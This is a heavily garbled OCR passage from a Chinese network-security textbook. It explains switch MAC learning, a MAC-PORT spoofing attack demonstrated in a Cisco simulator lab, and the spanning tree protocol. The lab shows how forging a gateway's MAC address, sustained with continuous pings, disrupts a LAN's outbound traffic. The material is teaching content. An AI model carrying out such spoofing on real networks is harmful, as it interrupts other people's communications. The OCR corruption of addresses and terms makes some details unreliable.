数据 携带 的 是 ARP 请 求 数据 。 这 个 报 文 到 达 交 换 机 之 后 ,交换 机 会 将 报 文 的 源 MAC 地 
址 ( 即 PC1 的 MAC) 与 接收 端口 1 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 。 

目的 MAC : 广播 地 址 ” 源 MAC : PC1 网 络 层 协 议 : ARP 


A0-A0-A0-A0-A0-A0 几 G0 RP 请求 数据 | 
PC1 广 播 的 ARP 请 求 报 文 
图 2-14 学 习 PC1l 的 MAC 地址 


PC3 返回 给 PC1 的 ARP 应 答 报 文 如 图 2-15 所 示 , 其 目的 MAC 为 PC1 的 MAC 地 
址 , 源 MAC 为 PC3 的 MAC 地 址 。 这 个 报 文 到 达 交 换 机 之 后 ,交换 机 会 将 报 文 的 源 
MAC 地 址 和 端口 3 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,至 此 两 条 映射 记录 形成 。 


目的 MAC : PC1 源 MAC : PC3 网 络 层 协 议 : ARP 


可 co-cococococo 基 ARPNS& 握 | 
PC3 返 回 的 ARP 应 答 报 文 
图 2-15 学 习 PC3 的 MAC 地 址 


33 MAC-PORT 攻击 


23.1 MAC-PORT 攻 击 原理 


MAC-PORT 攻击 是 指 黑客 利用 交换 机 的 地 址 学 习 机 制 ,发 送 伪造 源 MAC 地 址 的 数 
据 包 ,致使 交换 机 学 习 到 错误 的 MAC 地 址 和 端口 的 映射 记录 ,从 而 导致 通信 中 断 的 现 
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象 。 下 面 通 过 实例 具体 分 析 。 

如 图 2-16 所 示 环 境 中 主机 1 作为 黑客 , 它 的 攻击 目标 是 中 断 内 网 其 他 主机 与 外 网 的 
数据 通信 。 网 关 位 于 网 络 的 出 口 位 置 ,进出 网 络 的 数据 包 都 要 经 过 网 关中 转 。 图 中 左 侧 
是 正常 情况 下 的 MAC 地 址 转换 表 , 下 部 是 主机 1 发 送 的 伪造 IP 数据 报 , 其 目的 MAC 地 
址 是 广播 地 址 , 源 MAC 地 址 是 网 关 的 MAC。 这 个 报 文 到 达 交 换 机 之 后 ,交换 机 会 更 新 
自己 的 MAC 地 址 表 , 将 网 关 MAC 地 址 的 映射 端口 由 3 改 为 1( 图 2-16 右 侧 给 出 的 是 被 


破坏 之 后 的 MAC 地 址 表 ) 。 
全 | 10.1.1.2 
外 部 网 络 | E0-E0-E0-E0-E0-E0 
主机 


-10.1.1.1 
一 ”D0-D0-D0-D0-D0-D0 


192.168.0.3 
C0-C0-C0-C0-C0-C 


正常 的 MAC 地 址 转换 表 “一 破坏 的 MAC 地 址 转换 表 
A0-A0-A0-A0-A0-A0 <-> 1 A0-A0-A0-A0-A0-A0 <-> 1 
B0-B0-B0-B0-B0-B0 <-> 2 BO0-B0-B0-B0-B0-B0 <-> 2 
C0-C0-C0-C0-C0-C0 <-> 3 C0-C0-C0-C0-C0-C0 <-> 1 


192.168.0.1 
A0-A0-A0-A0-A0-A0 


192.168.0.2 
B0-B0-B0-B0-B0-B0 


目的 MAC : 广播 伪造 源 MAC : 网 关 网 络 层 协议 : IP 


EE EE EE EEEE | Co-Co-Co-Co-Co-Co 畏 G80| 高 层 数 据 
主机 1 发 送 的 伪造 1P 数 据 报 
图 2-16 MAC-PORT 攻击 


在 这 之 后 ,主机 2 发 送 给 外 网 的 数据 流量 到 达 交 换 机 之 后 ,由 于 这 些 数据 流 的 目的 
MAC 地 址 为 C0-C0-C0-C0-C0-C0, 受 MAC 地 址 表 的 影响 ,这 些 通信 数据 将 被 误导 至 主 
机 1, 即 主机 2 与 外 网 的 通信 中 断 。 但 外 网 发 送 给 内 网 的 数据 包 仍然 可 以 正常 传递 ,这 些 
报 文 在 内 网 传输 时 ,它们 的 源 MAC 地 址 为 网 关 的 MAC ,它们 会 将 交换 机 MAC 地 址 表 
中 网 关 MAC 地 址 的 映射 端口 由 1 刷新 回 3, 从 而 恢复 内 网 主机 与 外 网 的 通信 。 因 此 黑客 
为 了 实现 稳定 的 攻击 效果 ,必须 连续 不 断 地 发 送 伪造 的 数据 包 , 保 证 MAC 地 址 表 始 终 处 
于 被 破坏 的 状态 。 


232 测试 MAC-PORT 地 址 攻击 


训练 : 通过 实例 演练 MAC-PORT 攻击 。 测 试 目的 包括 : 查看 攻击 实施 之 后 MAC 
地 址 表 的 变化 ;验证 内 网 到 外 网 的 通信 和 是否 中 断 。 
第 一 步 : 组 建 网 络 。 
按照 图 2-16 利用 Cisco 模拟 器 组 建 网 络 , 选 择 一 台 2590 交换 机 ,一 台 2621 路 由 器 
(有 两 个 以 太 网 接口 ) .一 台 服 务 器 (作为 外 部 主机 ) 两 台 PC, 如 图 2-17 所 示 。 注 意 : 路 
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由 器 与 外 部 主机 之 间 使 用 反 序 双 绞 线 连接 。 


10.1.1.1 
-D0-D0-D0-D0-DO 
2O21XM DPDO-DO-DO-DO 


外 网 关 = 
Es | 10.1.1.2 
E0-E0-E0-E0-E0-E0 


| Server-PT 
“外 部 主机 


192.168.0.3 一 
C0-C0-C0-C0-C0-C0 


2950-24 


交换 机 
一 一/ yy. 
PC-PT PC-PT 
主机 1 主机 2 
192.168.0.1 192.168.0.2 
A0-A0-A0-A0-A0-A0 BO0-B0-B0-B0-B0-BO 


图 2-17 利用 Cisco 模拟 器 组 建 的 网 络 


按照 如 图 2-16 所 示 的 情况 配置 各 个 对 象 的 接口 IP 和 MAC 地 址 ,地 址 配置 步骤 略 ， 
下 面 给 出 网 关内 外 网 接口 的 地 址 配置 结果 ,如 图 2-18 和 图 2-19 所 示 。 


MAC Address coco.coco.coco MAC Address 50D0.00D0.5000  ] 
Ip Address 192.168.0.3 Ip Address 10.1.1.1 | 
Subnet Mask 255.255.255.0 Subnet Mask 255,255,255,0 | 


图 2-18 网 关内 网 接口 的 地 址 信息 图 2-19 网 关外 网 接口 的 MAC 地 址 


第 二 步 : 测试 主机 2 与 外 网 的 连通 情况 ,查看 正常 状态 下 交换 机 的 MAC 地 址 表 。 
在 主机 2 上 执行 ping 10. 1.1. 2 命令 ,图 2-20 为 执行 结果 ,可 见 主机 2 与 外 网 的 通信 
正常 。 


查看 2590 交换 机 的 MAC 地 址 表 , 结 果 如 图 2-21 所 示 ,可见 MAC 地 址 表 状 态 正常 。 


Switch#show mac-address-table 
Mac Address Table 


Vlan Mac Address Type Ports 


1 a0a0.a0a0.a0a0 DYNAMIC Fa0/1 一 主机 1 

1 b0b0.b0b0.b0b0 DYNAMIC Fa0/2 一 - 主机 2 

1 cOcO.c0c0.c0c0 DYNAMIC Fa0/3 一 - 网 关 
图 2-20 在 主机 2 上 执行 ping 10.1.1.2 的 结果 图 2-21 正常 情况 下 的 MAC 地 址 表 


第 三 步 : 在 主机 1 发 送 伪造 的 数据 包 , 同 时 查看 MAC 地 址 表 的 变化 。 
在 主机 1 发 送 伪造 的 数据 包 ,其 源 MAC 地 址 要 设置 成 网关 的 MAC。 在 真实 的 网 络 
环境 下 ,可 以 使 用 Sniffer 发 送 这 个 伪造 的 报 文 。 但 在 Cisco 模拟 器 组 成 的 网 络 环境 中 无 


23 


网 络 安全 基础 


法 发 送 伪造 的 数据 包 ,为 了 完成 这 个 任务 ,将 主机 1 的 MAC 地 址 修改 为 网 关 的 MAC ,这 
样 一 来 ,主机 1 发 送 的 所 有 数据 包 其 源 MAC 地 址 均 为 C0-C0-C0-C0-C0-Co0。 

修改 主机 1 的 MAC 地 址 之 后 ,在 主机 1 执行 ping 192. 168. 0. 2 命令 ,这 条 命令 会 导致 
主机 1 向 主机 2 发 送 报 文 , 报 文 到 达 交 换 机 之 后 ,交换 机 会 将 MAC 地 址 C0-C0-C0-C0-Co- 
20 映射 的 端口 号 由 3 修改 为 1, 图 2-22 为 在 交换 机 上 查看 到 的 修改 之 后 的 MAC 地 址 表 。 


| 出 


Switch#show mac-address-table 
Mac Address Table 


Vlan Mac Address 


Type Ports 


1 a0a0.a0a0.a0a0 DYNAMIC Fa0/l 
1 b0b0.b0b0.b0b0 DYNAMIC Fa0/2 
1 c0c0.c0c0.c0c0 DYNAMIC Fa0/1 一 网 关 的 EAC 被 映射 为 端口 1 


图 2-22 被 破坏 的 MAC 地 址 表 


第 四 步 : 测试 内 网 到 外 网 方向 的 通信 情况 。 

由 于 交换 机 的 MAC 地 址 表 中 网 关 的 MAC 地 址 被 映射 为 端口 1, 内 网 主机 发 给 外 网 
的 数据 包 到 达 交 换 机 之 后 都 会 在 端口 1 转发 ,因此 内 网 到 外 网 方向 的 通信 中 断 。 

在 主机 2 上 执行 ping 10. 1. 1.2 命令 ,结果 如 图 2-23 所 示 , 可 见 主机 2 到 外 网 方向 的 
通信 中 断 。 


WE 


端 


图 2-23 


主机 2 到 外 网 方向 的 通信 中 断 


第 五 步 : 测试 外 网 到 内 网 方向 的 通信 和 情况。 

外 网 发 给 内 网 的 数据 包 在 经 对 疯 头 ， 让 转 之 后 ,这 类 报 文 的 源 MAC 地 址 就 变换 为 网 
关 的 MAC 地 址 C0-C0-C0-C0-C0-C0, 这 些 报 文 导致 交换 机 将 C0-C0-C0-C0-C0-C0 的 映 
射 端口 重新 更 改 回 1 端口 ( 见 图 2-24) ,这 使 得 内 、 外 网 的 通信 重新 恢复 正常 状态 。 


Switch#show mac-address-table 
Mac Addr 


Vlan Mac Address 


1 bo0b0.b0b0.b0b0 DYNAMIC Fa0/2 
1 cOcO.cOc0.c0c0 DYNAMIC 


Type Ports 


一 一 出 新 为 正确 的 端口 


Fa0/3 


图 2-24 
24 


MAC 地 址 表 刷 新 回 正确 的 端口 


第 2 章 数据 链 路 层 及 其 安全 问题 


在 外 部 主机 访问 内 部 主机 的 结果 如 图 2-25 所 示 。 

第 六 步 : 在 主机 1 连续 不 断 地 发 送 伪 造 报 文 , 测 试 外 网 与 内 网 的 通信 情况 。 

在 主机 1 执行 ping -t 192. 168. 0. 2 命令 ,其 中 -t 参数 代表 连续 不 断 地 发 送 数 据 包 ,这 
条 命令 会 导致 主机 1 连续 不 断 地 向 主机 2 发 送 ICMP 数据 包 , 这 些 报 文 的 源 MAC 地 址 
为 C0-C0-C0-C0-C0-C0 ,它们 会 导致 交换 机 的 MAC 地 址 表 中 C0-C0-C0-C0-C0-C0 映射 
为 1 号 端口 。 

在 外 部 主机 执行 ping -t 192. 168. 0. 2 命令 ,外 部 主机 会 向 主机 2 连续 不 断 地 发 送 
ICMP 报 文 ,这 些 报 文 经 过 网 关 转 发 之 后 的 源 MAC 地 址 为 C0-C0-C0-C0-C0-C0 ,它们 会 
导致 MAC 地 址 表 中 C0-C0-C0-C0-C0-C0 映射 改 为 3 号 端口 。 

以 上 两 台 主 机 的 ping 行为 会 导致 交换 机 的 MAC 地 址 表 被 不 断 刷 新 ,MAC 地址 C0- 
C0-C0-C0-C0-C0 的 映射 端口 在 1 和 3 之 间 不 断 切换 。 主 机 2 会 连续 不 断 地 给 外 部 主机 
返回 ICMP 应 答 数据 报 ,这 些 数 据 报 的 目的 MAC 地 址 为 C0-C0-C0-C0-C0-C0, 当 它们 到 
达 交 换 机 时 如 果 网 关 的 MAC 地 址 映射 为 3 号 端口 , 则 这 个 ICMP 应 答 数 据 报 可 以 成 功 
转发 给 外 部 主机 ,如 果 网 关 的 MAC 地 址 映射 为 1 号 端口 , 则 这 个 ICMP 应 答 数据 报 将 发 
送 给 主机 1, 即 通信 中 断 。 图 2-26 为 外 部 主机 执行 ping 命令 的 数据 截图 ,可 以 看 到 在 通 
信 过 程 中 存在 中 断 现象 。 


图 2-26 外 网 与 内 网 的 通信 时 断 时 续 


2.4 ”生成 树 机 制 


241 元 余 链 路 


使 用 宛 余 链 路 可 以 提高 网 络 的 可 靠 性 ,以 图 2-27 为 例 进行 说 明 。 图 2-27 是 一 个 由 
三 台 交 换 机 组 成 的 网 络 ,三 台 交 换 机 通过 两 条 物理 链 路 连接 。 正 常情 况 下 这 两 条 链 路 可 
以 保证 网 络 通信 畅通 ,但 如 果 某 条 链 路 出 现 异 常 , 则 网 络 通信 中 断 。 

为 了 提高 网 络 的 可 靠 性 ,管理 员 在 SW1 和 SW2 之 间 连 接 了 一 条 宛 余 链 路 ,如 图 2-28 
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所 示 。 这 样 一 来 ,三 台 交 换 机 通过 三 条 物理 链 路 连接 ,如 果 某 条 链 路 出 现 异 常 ,另外 两 条 
链 路 仍 能 保证 网 络 通信 正常 。 


192.168.0.3 夯 | 
C0-C0-C0-C0-C0-C0 (3 


192.168.0.1 | 192.168.0.2 
A0-A0-A0-A0-A0-A0 G3 E337 B0-B0-B0-B0-B0-B0 
主机 1 主机 2 
图 2-27 无 匈 余 链 路 的 网 络 
主机 3 
192.168.0.3 画 | 
C0-C0-C0-C0-C0-C0 号 ， 
SWIl SW2 
192.168.0.1 夯 | 面 | 192.168.0.2 
A0-A0-A0-A0-A0-A0 (3 7 B0-B0-B0-B0-B0-B0 


主机 1 主机 2 
图 2-28 增加 宛 余 链 路 之 后 的 网 络 


242 重复 帧 .循环 问题 和 MAC 地 址 表 不 稳定 问题 


宛 余 链 路 虽然 提高 了 网 络 的 可 靠 性 ,但 也 带 来 了 重复 帧 .循环 问题 和 交换 机 MAC 地 
址 表 不 稳定 问题 ,下 面 举例 说 明 。 

在 如 图 2-29 所 示 的 网 络 环境 中 ,主机 1 给 主机 2 发 送 一 个 数据 包 ,数据 包 的 源 MAC 
地 址 为 A0-A0-A0-A0-A0-A0 .目的 MAC 地址 为 BO0-B0-B0-B0-B0-B0, 报 文 到 达 SW1 之 
后 ,SW1 将 报 文 的 源 MAC 地 址 Ao-Ao-A0-Ao-Ao-A0 与 接收 端口 1 作为 一 条 映射 记录 
添加 到 MAC 地 址 表 中 ,之 后 将 报 文 在 2、3 端口 转发 。 
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192.168.0.3 
C0-C0-C0-C0-C0-C0 
1 


SW1 的 MAC 地 址 表 
A0-A0-A0-A0-A0-A0 <-> 1 


SW1 


192.168.0.1 加 | 192.168.0.2 
A0-AO-A0-AO-A0-AO 台 C37 B0-B0-B0-B0-B0-B0 


主机 1 主机 2 
图 2-29 主机 1 给 主机 2 发 出 的 数据 包 


如 图 2-30 所 示 ,SW2 从 3 号 端口 收 到 这 个 数据 包 之 后 ,将 报 文 的 源 MAC 地 址 A0- 
A0-A0-A0-A0-A0 与 接收 端口 3 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,然后 在 1、2 
端口 转发 报 文 。 主 机 2 第 一 次 接收 到 这 个 数据 包 。 


主机 3 
192.168.0.3 问 
C0-C0-C0-C0-C0-C0 (7 


SW3 的 MAC 地 址 表 
A0-A0-A0-A0-A0-A0 <-> 2 


SW1 的 MAC 地 址 表 、\ SW2 的 MAC 地 址 表 
nid 人 尖 叶 XK 
AO-A0-A0-A0-A0-A0 <-> 1 \» LA0-A0-A0-A0-A0-A0 <>3 
SWI i SW 
192.168.0.1 面 | 192.168.0.2 
A0-A0-A0-A0-AO-AIO € £3? B0-B0-B0-B0-BO-B0 


主机 1 主机 2 
图 2-30 SW2 和 SW3 转发 数据 包 


SW3 从 2 号 端口 收 到 这 个 数据 包 之 后 ,将 报 文 的 源 MAC 地 址 A0-A0-A0-A0-A0-A0 
与 接收 端口 2 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,然后 在 1、3 端口 转发 这 个 报 文 。 
如 图 2-31 所 示 ,SW2 从 2 号 端口 收 到 SW3 转发 的 数据 包 之 后 ,将 报 文 的 源 MAC 地 
址 A0-A0-A0-A0-A0-Ao 与 接收 端口 2 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,然后 在 
1、3 端口 转发 报 文 。 注 意 此 时 SW2 的 MAC 地 址 表 出 现 了 不 稳定 现象 ,MAC 地 址 A0- 
A0-A0-A0-A0-A0 的 映射 端口 由 3 变 成 了 2, 同 时 主机 2 第 二 次 收 到 这 个 数据 包 , 即 出 现 
了 重复 帧 现象 。 
SW3 从 3 号 端口 收 到 这 个 数据 包 之 后 ,将 报 文 的 源 MAC 地 址 A0-A0-A0-A0-A0-A0 
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与 接收 端口 3 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,然后 在 1、2 端口 转发 这 个 报 文 。 


注意 此 时 SW3 的 MAC 地 址 表 出 现 了 不 稳定 现象 ,MAC 地 址 A0-A0-A0-A0-A0-A0 的 


映射 端口 由 2 变 成 了 3。 


主机 3 
192.168.0.3 面 | 
C0-C0-C0-C0-C0-C0 G7 
Ty SW3 的 MAC 地 址 表 


A0-A0-A0-A0-A0-A0 <-> 3 


SW2 的 MAC 地 址 表 
A0-A0-A0-A0-A0-A0 <-> 2 


SW1 的 MAC 地 址 表 
A0-A0-A0-A0-A0-A0 <-> 1 


SW1 SW2 


192.168.0.2 


192.168.0.1 
B0-B0-B0-B0-B0-B0 


A0-A0-A0-A0-A0-AI0 €£ 


图 2-31 SW3 和 SW2 转发 数据 包 


如 图 2-32 所 示 ,假设 SW1 先 从 2 号 端口 收 到 这 个 数据 包 , 将 报 文 的 源 MAC 地 址 
A0-A0-A0-A0-A0-A0 与 接收 端口 2 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,然后 在 1、 
3 端口 转发 报 文 。 注 意 此 时 SW1 的 MAC 地 址 表 出 现 了 不 稳定 现象 ,MAC 地 址 A0-A0- 


A0-A0-A0-A0 的 映射 端口 由 1 变 成 了 2。 


192.168.0.3 画 | 
C0-C0-C0-C0-C0-C0 G7 
SW3 的 MAC 地 址 表 


A0-A0-A0-A0-A0-A0 <->3 


SW2 的 MAC 地 址 表 
A0-A0-A0-A0-A0-A0 <-> 2 


SW1 的 MAC 地 址 表 
A0-A0-A0-A0-A0-A0 <-> 2/3 


SW1 SW2 


192.168.0.2 


192.168.0.1 
9 B0-B0-B0-B0-B0-B0 


A0-A0-A0-A0-A0-A0 € 


图 2-32 ”SW1 转发 数据 包 


接着 SW1 又 从 3 号 端口 收 到 这 个 数据 包 , 将 报 文 的 源 MAC 地 址 A0-A0-A0-A0-A0- 
A0 与 接收 端口 3 作为 一 条 映射 记录 添加 到 MAC 地 址 表 中 ,然后 在 1、2 端口 转发 报 文 。 
注意 此 时 SW1 的 MAC 地 址 表 出 现 了 不 稳定 现象 ,MAC 地 址 A0-A0-A0-A0-A0-A0 的 
映射 端口 由 2 变 成 了 3。 
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从 这 之 后 SW1 在 2、3 端口 转发 的 数据 包 开 始 第 二 轮 循环 传递 ,在 传送 过 程 中 三 台 交 
换 机 的 MAC 地 址 表 始 终 处 于 不 稳定 状态 不 断 变化 ,主机 2 会 不 断 接收 到 重复 数据 帧 。 


243 生成 树 


解决 上 述 问题 的 根本 方法 是 去 除 网 络 中 的 循环 路 径 , 这 可 以 利用 生成 树 算 法 实现 。 
生成 树 算法 的 基本 思想 是 从 一 个 图 状 结构 中 计算 出 一 棵 没有 循环 路 径 的 树 状 结构 ,这 样 
一 来 既 可 以 去 除 网 络 中 的 循环 路 径 又 可 以 保证 网 络 的 连通 性 。 图 状 结构 与 树 状 结构 的 转 
换 关 系 如 图 2-33 所 示 。 


Toot 


如 -大 


图 状 结构 树 状 结构 
图 2-33 图 状 结构 转换 为 树 状 结构 


在 交换 机 之 间 按 固定 时 间 间 隔 ( 例 如 2s) 传 递 特殊 的 消息 BPDU (Bridge Protocol 
Data Unit ,网 桥 协 议 数据 单元 ) 来 创建 .维护 生成 树 。 生 成 树 算 法 描述 如 下 : 

(1) 每 个 交换 机 都 有 一 个 唯一 的 ID 号 ,选择 ID 最 小 的 交换 机 作为 根 结 点 (root) 。 

(2) 每 个 交换 机 ( 根 结 点 除外 ) 有 一 个 端口 作为 根 端口 (root port) 。 根 端口 是 具有 到 
根 结 点 最 小 花费 路 径 的 端口 。 花 费 的 含义 由 网 络 管理 员 指定 ,可 能 是 最 小 跳 数 (交换 机 的 
个 数 ) ,也 可 能 是 链 路 的 带宽 。 两 个 端口 具有 相同 的 花费 , 则 随机 选择 一 个 。 

(3) 为 每 条 物理 链 路 确定 一 台 指 定 交 换 机 。 指 定 交 换 机 到 根 结 点 的 路 径 花 费 最 小 。 
如 果 两 台 交 换 机 具有 相同 的 最 小 花费 , 则 选择 ID 较 小 的 那个 。 选 择 物理 链 路 和 指定 交换 
机 连接 的 端口 作为 指定 端口 (desg port) 。 

(4) 标 记 根 端口 和 指定 端口 为 转发 端口 (forwording port) ,其 余 的 作为 阻塞 端口 
(blocking port) 。 转 发 端口 转发 数据 ,阻塞 端口 不 转发 。 

每 台 交 换 机 都 有 唯一 的 ID 号 ,ID 号 由 两 字 节 的 优先 级 字段 和 6 字 节 的 交换 机 MAC 
地 址 组 成 。 在 进行 ID 号 大 小 比较 时 ,首先 比较 优先 级 的 大 小 ,如 果 优 先 级 相同 (例如 ， 
Cisco 交换 机 的 默认 优先 级 均 为 32 768) ,再 逐 字 节 比 较 MAC 地 址 的 大 小 。 


通常 情况 下 路 径 花 费用 带宽 表示 ,IEEE 规定 的 链 路 连接 速率 代价 
代价 如 图 2-34 所 示 。 链 路 传输 速率 越 高 .路 径 花费 越 小 。 lee 

下 面 以 图 2-35 为 例 说 明生 成 树 算法 。 首 先 确定 根 100Mb/s 19 
结 点 ,在 如 图 2-35 所 示 环 境 中 三 台 交 换 机 的 优先 级 相 JMBS 
同 ,因此 比较 MAC 地 址 的 大 小 ,SW3 成 为 根 结 点 。 图 2-34 IEEE 规定 的 链 路 代价 


接 下 来 确定 每 台 交 换 机 ( 根 结 点 除外 ) 的 根 端口 
(root port) 。 根 端口 是 具有 到 根 结 点 最 小 花费 路 径 的 端口 。 图 中 三 条 物理 链 路 都 是 
100Mby/s 链 路 , 因此 代价 都 是 19。SW1 的 2 端口 到 根 结 点 的 花费 为 19,3 端口 到 根 结 点 
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主机 3 
192.168.0.3 面 | 


C0-C0-C0-C0-C0-C0 会 7 


desg port desg port 
Toot port Toot port 
SS 2 p> 


0001.C931.8BE2 SW!1 一 sw 00D0.D39C.0192 


192.168.0.1 [a 192.168.0.2 
A0-A0-A0-A0-A0-A0 会 会” B0-B0-B0-B0-B0-B0 


主机 1 主机 2 
图 2-35 使 用 生成 树 去 除 环 路 


的 花费 为 38, 因 此 端口 2 为 SW1 的 根 端口 。 同 样 SW2 的 根 端口 为 2 号 端口 。 

下 面 为 每 条 物理 链 路 确定 一 台 指定 交换 机 ,然后 确定 指定 端口 (desg port) 。 指 定 的 
交换 机 到 根 结 点 的 路 径 花费 最 小 。 对 于 SW1 一 SW3 链 路 ,显然 SW3 为 指定 交换 机 ,因此 
SW3 的 2 号 端口 为 指定 端口 。 对 于 SW2 一 SW3 链 路 ,也 是 SW3 为 指定 交换 机 ,SW3 的 
3 号 端口 为 指定 端口 。 对 于 SW1 一 SW2 链 路 ,因为 SW1 和 SW2 到 根 结 点 的 花费 都 是 
19, 这 时 ID 号 较 小 的 SW1 成 为 指定 交换 机 ,因此 SW1 的 3 号 端口 成 为 指定 端口 。 

最 后 标记 根 端口 和 指定 端口 为 转发 端口 (forwording port) ,其 余 的 作为 阻塞 端口 
(blocking port)。SW2 的 3 号 端口 被 标记 为 阻塞 端口 ,该 端口 不 收发 数据 包 。 这 样 一 来 
SW1 一 SW2 链 路 被 中 断 , 网 络 中 的 环 路 被 去 除 ,之 前 元 余 链 路 带 来 的 诸多 问题 也 随 之 解决 。 

当 网 络 中 其 他 链 路 出 现 故障 时 ,SW1 一 SW2 链 路 会 在 生成 树 算法 的 作用 下 重新 启 
动 , 下 面 举例 说 明 。 如 图 2-36 所 示 ,假设 SW1 一 SW3 链 路 中 断 , 这 时 三 台 交 换 机 重新 计算 


192.168.0.3 户 
C0-C0-C0-C0-C0-CO Ly 


0001.4330.6BB6 
desg port 


3 一 -一 


0001.C931.8BE2 SWI 


也 3 
a / 


192.168.0.1 | “desg port 192.168.0.2 
A0-A0-A0-A0-A0-A0 全 会 B0-B0-B0-B0-B0-B0 
主机 1 主机 2 


图 2-36 在 链 路 出 现 故 障 时 ,被 阻 断 的 链 路 自动 恢复 
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生成 树 。SW1 的 3 号 端口 由 指定 端口 (desg port) 变 为 根 端口 (root port) ,SW2 的 3 号 端 
1 阻塞 端口 (blocking port) 变 为 指定 端口 (desg port) 。 网 络 通信 重新 恢复 正常 。 


244 测试 生成 树 机 制 


训练 : 利用 Cisco 模拟 器 组 建 如 图 2-35 所 示 的 网 络 ,测试 交换 机 的 生成 树 机 制 。 

第 一 步 : 利用 Cisco 模拟 器 组 建 网 络 。 

利用 Cisco 模拟 器 按照 图 2-35 组 建 网 络 ,添加 三 台 2960 交换 机 ,使 用 三 根 网 线 将 三 
台 交 换 机 连接 起 来 , 按 如 图 2-35 所 示 确 定 连 接 端口 。 再 添加 三 台 主 机 ,主机 均 连 接 到 所 
属 交换 机 的 1 号 端口 ,组 建 好 的 网 络 如 图 2-37 所 示 。 


New Cluster 


Seryer-PT 
ClusterOl(Server0) 


io 


Logical [Root] Move Object Set Tiled Background 


Pk) 073 
296 呈 24TT 


Switch2 


图 2-37 利用 Cisco 模拟 器 组 建 的 网 络 


第 二 步 : 配置 三 台 主 机 的 IP 和 MAC 地 址 。 
参照 图 2-35 配置 三 台 主 机 的 IP 和 MAC 地址。 三 台 主 机 的 地 址 配置 结果 如 图 2-38 一 
图 2-40 所 示 。 


图 2-38 ”PCo 的 地 址 信息 


B53 


图 2-40 ”Server 的 地 址 信息 
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第 三 步 : 查看 生成 树 结果 。 
交换 机 上 的 生成 树 机 制 默认 是 开启 状态 ,只 要 将 网 络 连接 好 ,交换 机 之 间 自 动 交 换 


BPDU 数据 包 , 完 成 生成 树 的 计算 ,下 面 依次 查看 三 台 交 换 机 的 生成 树 计 算 结 果 。 

在 SW1 交换 机 的 控制 台 界 面 输入 en 命令 进入 配置 权限 ,输入 show spanning-tree 
命令 查看 生成 树 信息 ,如 图 2-41 所 示 。 在 根 结 点 信息 中 根 结 点 的 优先 级 为 32 768、MAC 
地 址 为 0001. 4330. 6BB6 、 链 路 花费 为 19。SW1 结 点 的 优先 级 为 32 768、MAC 地 址 为 
0001. c931. 8BE2。Fa0/1 和 Fa0/3 端口 为 指定 端口 .Fa0/2 为 根 端口 。 

同样 ,得 到 SW2 和 SW3 的 生成 树 信息 ,如 图 2-42 和 图 2-43 所 示 。 
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desg port— 


Iroot port 


desg port 


Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) 一 一 SR1 的 优先 级 为 32 768 
SW1 信 息 { 


Switch>en 一 一 获 奉 配置 私 限 
Switch#show spanning-tree ”一 一 查看 生成 树 
VLAN0001 
Spanning tree enabled protocol ieee 
Root ID Priority 32769 一 一 根 结 点 的 优先 级 为 32 768 
Address ”0001.4330.6BB6 一 一 根 结 点 的 IAC 地 址 
Cost 19 
Port 2(FastEthernet0/2) 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Address ”0001.C931.8BE2 ”一 一 SR1 的 1AC 地 址 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


Interface RoleStsCost Prio.Nbr Type 


Fa0/l Desg FWD 19 128.1 P2p 
Fa0/2 Root FWD 19 128.2 P2p 
Fa0/3 Desg FWD 19 128.3 P2p 


图 2-41 SW1 的 生成 树 信息 


{ Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) 一 一 SW2 的 优先 级 为 32 768| 
SR2 信 息 


desg port 一 一 Fa0/1 Desg FWD 19 128.1 P2p 
ZX008 port Fa0/2 Root FWD 19 128.2 P2p 
BIK port -一 Fa0/3 Altn BLK 19 128.3 P2p 


Switch>en 一 一 获得 配置 权限 
Switch#show spanning-tree 一 一 查看 生成 树 
VLAN0001 


Spanning tree enabled protocol ieee 
RootID Priority 32769 一 一 根 结 点 的 优先 级 为 32 768 
Address 0001.4330.6BB6 根 结 点 的 HAC 地 址 
Cost 19 
Port 2(FastEthernet0/2) 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Address 00D0.D39C.0192 Sm2 的 IAC 地 址 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


Interface Role Sts Cost Prio.Nbr Type 


图 2-42 SW2 的 生成 树 信息 
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Switch>en 一 一 获得 配置 权限 
Switch#show spanning-tree 一 一 查看 生成 权 
VLAN0001 


Spanning tree enabled protocol ieee 
RootID Priority 32769 一 一 根 结 点 的 优先 级 为 32 768 
机 结 点 Address = 0001.4330.6BB6 根 结 点 的 1AC 地 址 
This bridge is the root 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Address ”0001.4330.6BB6 一 一 SW3 的 ITAC 地 址 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) 一 一 SW3 的 优先 级 为 32 768 
SW3 信 息 
Aging Time 20 


Interface Role Sts Cost Prio.Nbr Type 


aesg port 一 一 Fa0/1 Desg FWD 19 128.1 P2p 
desg port 一 一 Fa0/2 Desg FWD 19 128.2 P2p 


Besg_port— Fa0/3 DesgFWD 19 1283 P2 
图 2-43 ”SW3 的 生成 树 信息 


通过 上 面 的 结果 可 知 , 得 到 的 生成 树 信 息 与 之 前 的 分 析 结 果 一 致 。 

第 四 步 : 去 掉 SW1 一 SW3 链 路 ,查看 生成 树 能 否 自 动 更 新 。 

在 Cisco 模拟 器 中 剪 掉 SW1 一 SW3 链 路 ,模拟 这 条 链 路 出 现 故障 。 去 除 链 路 之 后 ， 
三 台 交 换 机 通过 定期 发 送 的 BPDU 报 文 重新 计算 生成 树 ,以 保证 网 络 的 连通 ,如 图 2-44 


所 示 。 
f Logical [Root] New Cluster Move Object SetTiled Background 
- 一 I 


Seryer-PpT 
clusteroh Servero) 


[~ 


si 一 一 一 
296024TT 

E 2960124TT 
T 


图 2-44 SW1 一 SW3 链 路 中 断 


